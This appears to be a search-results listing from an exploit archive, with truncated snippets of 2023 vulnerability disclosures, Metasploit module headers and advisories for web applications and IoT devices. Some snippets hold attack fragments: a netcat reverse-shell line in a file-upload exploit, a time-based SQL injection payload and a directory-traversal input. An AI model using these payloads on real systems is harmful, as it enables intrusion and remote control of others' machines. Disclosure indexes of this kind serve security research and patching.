50738 matches found
GaatiTrack Courier Management System 1.0 SQL Injection
Exploit Title: GaatiTrack Courier Management System v1.0 - SQL Injection Date: 13/11/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.mayurik.com/ Software Link: https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php...
R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure
R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure Vendor: R Radio Network Product web page: http://www.pktc.ac.th Affected version: 1.07 Summary: R Radio FM Transmitter that includes FM Exciter and FM Amplifier parameter setup. Desc: The transmitter suffers from an improper acces...
PHPJabbers Time Slots Booking Calendar 4.0 HTML Injection
Exploit Title: PHPJabbers Time Slots Booking Calendar v4.0 - HTML Injection Date: 13/11/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/time-slots-booking-calendar/ Version: v4.0 Tested on:...
WBCE CMS 1.6.1 Shell Upload
Exploit Title: WBCE CMS Version : 1.6.1 Remote Command Execution Date: 30/11/2023 Exploit Author: tmrswrr Vendor Homepage: https://wbce-cms.org/ Software Link: https://github.com/WBCE/WBCECMS/archive/refs/tags/1.6.1.zip Version: 1.6.1 Tested on: https://www.softaculous.com/apps/cms/WBCECMS POC: 1...
Kopage Website Builder 4.4.15 Cross Site Scripting
Exploit Title: Kopage Website Builder version 4.4.15 – Stored Cross-Site Scripting XSS Date: 1/12/2023 Exploit Author: tmrswrr Vendor Homepage: https://www.kopage.com/ Version: Version : 4.4.15 Tested on: https://demo.kopage.com/index.php Poc: 1 Install the system through the website and log in...
Online Student Clearance System 1.0 Shell Upload
!/usr/bin/python3 Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE Authenticated Date: 28/11/2023 Exploit Author: Akash Pandey aka l3v1ath0n Version: &1|nc " + localip + " " + localport + " /tmp/f" Firing request to login logurl = weburl+"login.php" Telling script ...
CE Phoenix 1.0.8.20 Remote Code Execution
Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution RCE Authenticated Date: 2023-11-25 Exploit Author: tmrswrr Category: Webapps Vendor Homepage: CE Phoenix Version: v1.0.8.20 Tested on: Softaculous Demo - CE Phoenix EXPLOIT : import requests from bs4 import BeautifulSoup import sys impor...
WordPress Royal Elementor Addons And Templates Remote Shell Upload
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WordPress Royal Elementor Addons RCE', 'Description' = %q Exploit for the unauthenticated file upload vulnerability in WordPress Royal Elementor...
Loytec L-INX Automation Servers Information Disclosure / Cleartext Secrets
CVE : CVE-2023-46386, CVE-2023-46387, CVE-2023-46388, CVE-2023-46389 + Title : Multiple vulnerabilities in Loytec L-INX Automation Servers + Vendor : LOYTEC electronics GmbH + Affected Products : LINX-151, Firmware 7.2.4, LINX-212, firmware 6.2.4 + Affected Components : L-INX Automation Servers +...
SmartNode SN200 3.21.2-23021 OS Command Injection
Advisory ID: SYSS-2023-019 Product: SmartNode SN200 Analog Telephone Adapter ATA & VoIP Gateway Manufacturer: Patton LLC Affected Versions: = 3.21.2-23021 Tested Versions: 2.21.1-22041, 3.21.2-23021, 3.22.0-23083 Vulnerability Type: OS Command Injection CWE-78 Vulnerability Type: Improper Access...
etcd-browser 87ae63d75260 Directory Traversal
An issue was discovered in server.js in etcd-browser 87ae63d75260. By supplying a /../../../ Directory Traversal input to the URL's GET request while connecting to the remote server port specified during setup, an attacker can retrieve local operating system files from the remote system...
Loytec LINX Configurator 7.4.10 Insecure Transit / Cleartext Secrets
CVE : CVE-2023-46383, CVE-2023-46384, CVE-2023-46385 + Title : Multiple vulnerabilities in Loytec LINX Configurator + Vendor : LOYTEC electronics GmbH + Affected Products : LINX Configurator 7.4.10 + Affected Components : LINX Configurator + Discovery Date : 01-Sep-2021 + Publication date :...
m-privacy TightGate-Pro Code Execution / Insecure Permissions
SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple Vulnerabilities product: m-privacy TightGate-Pro vulnerable version: Rolling Release, servers with the following package versions are vulnerable: tightgatevnc...
Fortra Digital Guardian Agent Uninstaller Cross Site Scripting / UninstallKey Cached
SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Uninstall Key Caching product: Fortra Digital Guardian Agent Uninstaller Data Loss Prevention vulnerable version: Agent: 7.9.4 fixed version: Agent: 7.9.4 CVE number:...
osCommerce 4 Cross Site Scripting
Exploit Title: osCommerce 4 - Reflected XSS Exploit Author: CraCkEr Date: 13/11/2023 Vendor: osCommerce ltd. Vendor Homepage: https://www.oscommerce.com/ Software Link: https://demo.oscommerce.com/ Demo Link: https://demo.oscommerce.com/printshop/ Tested on: Windows 11 Home Impact: Manipulate the...
PopojiCMS 2.0.1 Remote Command Execution
Exploit Title: PopojiCMS Version : 2.0.1 Remote Command Execution Date: 27/11/2023 Exploit Author: tmrswrr Vendor Homepage: https://www.popojicms.org/ Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip Version: Version : 2.0.1 Tested on:...
CSZ CMS 1.3.0 Remote Command Execution
Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution Date: 17/11/2023 Exploit Author: tmrswrr Vendor Homepage: https://www.cszcms.com/ Software Link: https://www.cszcms.com/link/3https://sourceforge.net/projects/cszcms/files/latest/download Version: Version 1.3.0 Tested on:...
CE Phoenix 1.0.8.20 Remote Command Execution
Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution RCE Authenticated Date: 2023-11-25 Exploit Author: tmrswrr Category: Webapps Vendor Homepage: CE Phoenix Version: v1.0.8.20 Tested on: Softaculous Demo - CE Phoenix POC: 1. Login to admin panel: - Visit:...
TitanNit Web Control 2.01 / Atemio 7600 Root Remote Command Execution
!/usr/bin/env python -- coding: utf-8 -- TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution Vendor: AAF Digital HD Forum | Atelmo GmbH Product web page: http://www.aaf-digital.info | https://www.atemio.de Affected version: Firmware =2.01 Summary: The Atemio AM 520 HD Full HD...
PyroCMS 3.0.1 Cross Site Scripting
Exploit Title: PyroCMS v3.0.1 - Stored XSS Date: 2023-11-25 Exploit Author: tmrswrr Category : Webapps Vendor Homepage: https://pyrocms.com/ Version: v3.0.1 Tested on: https://www.softaculous.com/apps/cms/PyroCMS...
CSZ CMS 1.3.0 Shell Upload
Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution Date: 23/11/2023 Exploit Author: tmrswrr Vendor Homepage: https://www.cszcms.com/ Software Link: https://www.cszcms.com/link/3https://sourceforge.net/projects/cszcms/files/latest/download Version: Version 1.3.0 Tested on:...
CE Phoenix 1.0.8.20 Cross Site Scripting
Exploit Title: CE Phoenix Version 1.0.8.20 - Stored XSS Date: 2023-11-25 Exploit Author: tmrswrr Category : Webapps Vendor Homepage: https://phoenixcart.org/ Version: v3.0.1 Tested on: https://www.softaculous.com/apps/ecommerce/CEPhoenix POC: 1-Login admin panel , go to this url :...
WordPress UserPro 5.1.x Password Reset / Authentication Bypass / Escalation
Vulnerability Details & Technical Analysis Password Reset to Privilege Escalation using the Sensitive Information Disclosure via Shortcode Description: UserPro = 5.1.1 – Insecure Password Reset Mechanism Affected Plugin: UserPro Plugin Slug: userpro Affected Versions: = 5.1.1 CVE ID: CVE-2023-244...
Jorani Leave Management System 1.0.2 Host Header Injection
Exploit Title: Jorani Leave Management System v1.0.2 Host Header Attack Date: 12/11/2023 Exploit Author: BugsBD Security Researcher Rahad Chowdhury Vendor Homepage: https://jorani.org/ Software Link: https://github.com/bbalet/jorani/releases/download/v1.0.2/jorani-1.0.2.zip Version: v1.0.2 Tested...
FireBear Improved Import And Export 3.8.6 XSLT Server Side Injection
Exploit Title: FireBear Improved Import & Export ver. 3.8.6 for Magento 2.4.6 - XSLT Server Side Injection Command Execution Date: 2023-11-17 Exploit Author: tmrswrr Vendor Homepage: https://commercemarketplace.adobe.com/ Software Link:...
PHPJabbers Availability Booking Calendar 5.0 Cross Site Scripting
Exploit Title: Multiple Cross Site Scripting in PHPJabbers Availability Booking Calendar v5.0 Date: 12/11/2023 Exploit Author: BugsBD Security Researcher Orpon Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/availability-booking-calendar/sectionDemo Version:...
PHPJabbers Availability Booking Calendar 5.0 CSV Injection
Exploit Title: PHPJabbers Availability Booking Calendar v5.0 - CSV Injection Date: 12/11/2023 Exploit Author: BugsBD Security Researcher Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/availability-booking-calendar/sectionDemo Version: v5.0...
Shuttle Booking Software 2.0 Cross Site Scripting
Exploit Title: Shuttle Booking Software v2.0 - Multiple Stored Cross-Site Scripting Authenticated Date: 09/11/2023 Exploit Author: BugsBD Security Researcher Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/shuttle-booking-software/ Software Link:...
Magento 2.4.6 XSLT Server Side Injection
Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection Date: 2023-11-17 Exploit Author: tmrswrr Vendor Homepage: https://magento2demo.firebearstudio.com/ Software Link: Magento 2.4.6-p3 Version: 2.4.6 Tested on: 2.4.6 POC 1. Enter with admin credentials to this URL:...
GaatiTrack Courier Management System 1.0 Cross Site Scripting
Exploit Title: GaatiTrack Courier Management System v1.0 - Multiple Cross-site scripting Date: 12/112023 Exploit Author: BugsBD Security Researcher Rahad Chowdhury Vendor Homepage: https://www.mayurik.com/ Software Link:...
Magento 2.4.6 XSLT Server Side Injection / Command Execution
Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection Date: 2023-11-17 Exploit Author: tmrswrr Vendor Homepage: https://magento2demo.firebearstudio.com/ Software Link: https://github.com/magento/magento2/archive/refs/tags/2.4.6-p3.zip Version: 2.4.6 Tested on: 2.4.6 POC: 1 Enter with adm...
EzViz Studio 2.2.0 DLL Hijacking
PoC: DLL Hijacking via EzViz Studio Reported by EAFZ from Pythongoras Author: EAFZ aka myantti3m CVE: CVE-2023-41613. Test Environment: OS: Windows 11 Pro 64 bit10.0, Build 2261 EzViz Studio version: 2.2.0 Technical Description 1. Technical Description EzvizStudio.exe searches for a DLL called...
AjaxPro Deserialization Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'AjaxPro Deserialization Remote Code Execution', 'Description' = %q This module leverages an insecure deserialization of data to get remote code...
F5 BIG-IP TMUI Directory Traversal / File Upload / Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'F5 BIG-IP TMUI Directory Traversal and File Upload RCE', 'Description' = %q This module exploits a directory traversal in F5's BIG-IP Traffic...
F5 BIG-IP TMUI AJP Smuggling Remote Command Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/proto/apachejp' class MetasploitModule 'F5 BIG-IP TMUI AJP Smuggling RCE', 'Description' = %q This module exploits a flaw in F5's BIG-IP Traffic Management...
Apache ActiveMQ Unauthenticated Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Apache ActiveMQ Unauthenticated Remote Code Execution', 'Description' = %q This module exploits a deserialization vulnerability in the OpenWire...
ZoneMinder Snapshots Command Injection
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'ZoneMinder Snapshots Command Injection', 'Description' = %q This module exploits an unauthenticated command injection in zoneminder that can be...
EnBw SENEC Legacy Storage Box Log Disclosure
Advisory ID: Ph0s-2023-001 Product: EnBw - SENEC legacy storage box: V1-V3 Manufacturer: SENEC - a part of EnBw Affected Versions: Firmware: all as of 2023-06-19 Tested Versions: current Vulnerability Type: CWE-284: Improper Access Control Risk Level: CVSS v3.1 Vector:...
Cisco IOX XE Unauthenticated Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Cisco IOX XE Unauthenticated RCE Chain', 'Description' = %q This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable...
MagnusBilling Remote Command Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/stopwatch' class MetasploitModule 'MagnusBilling application unauthenticated Remote Command Execution.', 'Description' = %q A Command Injection vulnerabilit...
EnBw SENEC Legacy Storage Box Default Credentials
Advisory ID: Ph0s-2023-004 Product: EnBw - SENEC legacy storage box: V1-V3 Manufacturer: SENEC - a part of EnBw Affected Versions: Firmware: all as of 2023-06-19 Tested Versions: current Vulnerability Type: CWE-1392: Use of Default Credentials Risk Level: CVSS v3.1 Vector:...
Maxima Max Pro Power 1.0 486A BLE Traffic Replay
Exploit Title: Maxima Max Pro Power - BLE Traffic Replay Unauthenticated Date: 13-Nov-2023 Exploit Author: Alok kumar [email protected], Cyberpwn Technologies Pvt. Ltd. Vendor Homepage: https://www.maximawatches.com Product Link: https://www.maximawatches.com/products/max-pro-power Firmware...
EnBw SENEC Legacy Storage Box Information Disclosure
Advisory ID: Ph0s-2023-002 Product: EnBw - SENEC legacy storage box: V1-V3 Manufacturer: SENEC - a part of EnBw Affected Versions: Firmware: all as of 2023-06-19 Tested Versions: current Vulnerability Type: CWE-200: Exposure of Sensitive Information to an Unauthorized Actor Risk Level: CVSS v3.1...
Travel 1.0 SQL Injection
Title: travel-1.0-by-oretnom23 Multiple-SQLi Author: nu11secur1ty Date: 11/12/2023 Vendor: https://github.com/oretnom23 Software: https://github.com/oretnom23/php-travel-agency-system Reference: https://portswigger.net/web-security/sql-injection Description: The search parameter appears to be...
WordPress Contact Form To Any API 1.1.2 SQL Injection
Exploit Title: WP Plugins Contact Form to Any API = 1.1.2 - SQL Injection Date: 12-11-2023 Exploit Author: Arvandy Software Link: https://wordpress.org/plugins/contact-form-to-any-api/ Vendor Homepage: https://www.itpathsolutions.com/ Version: 1.1.2 Tested on: Windows, Linux CVE: CVE-2023-32741...
EnBw SENEC Legacy Storage Box Exposed Interface
Advisory ID: Ph0s-2023-005 Product: EnBw - SENEC legacy storage box: V1-V3 Manufacturer: SENEC - a part of EnBw Affected Versions: Firmware: all as of 2023-06-19 Tested Versions: current Vulnerability Type: CWE-923: Improper Restriction of Communication Channel to Intended Endpoints Risk Level:...
Penglead 2.0 SQL Injection
Title: penglead-2.0 SQLi-Bypass Authentication Author: nu11secur1ty Date: 11/10/2023 Vendor: https://www.mayurik.com/ Software: https://www.mayurik.com/source-code/P2760/lead-management-system-in-php-free-download Reference: https://portswigger.net/web-security/sql-injection Description: The id...
LOYTEC Electronics Insecure Transit / Insecure Permissions / Unauthenticated Access
CVE : CVE-2023-46380, CVE-2023-46381, CVE-2023-46382 + Title : Multiple vulnerabilities in Loytec LWEB-802, L-INX Automation Servers, L-IOB I/O Controllers, L-VIS Touch Panels + Vendor : LOYTEC electronics GmbH + Affected Products : LINX-212 firmware 6.2.4, LVIS-3ME12-A1 firmware 6.2.2, LIOB-586...
Elementor Website Builder SQL Injection
EXPLOIT Elementor Website Builder Replace URL page. On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL": code : http://localhost:8080/?test',metakey='key4'where+metaid=SLEEP2; Press "Replace URL" on the Replace URL page. Burp Suit...
EnBw SENEC Legacy Storage Box Hardcoded Credentials
Advisory ID: Ph0s-2023-003 Product: EnBw - SENEC legacy storage box: V1-V3 Manufacturer: SENEC - a part of EnBw Affected Versions: Firmware: all as of 2023-06-19 Tested Versions: current Vulnerability Type: CWE-307: Improper Restriction of Excessive Authentication Attempts CWE-798: Use of...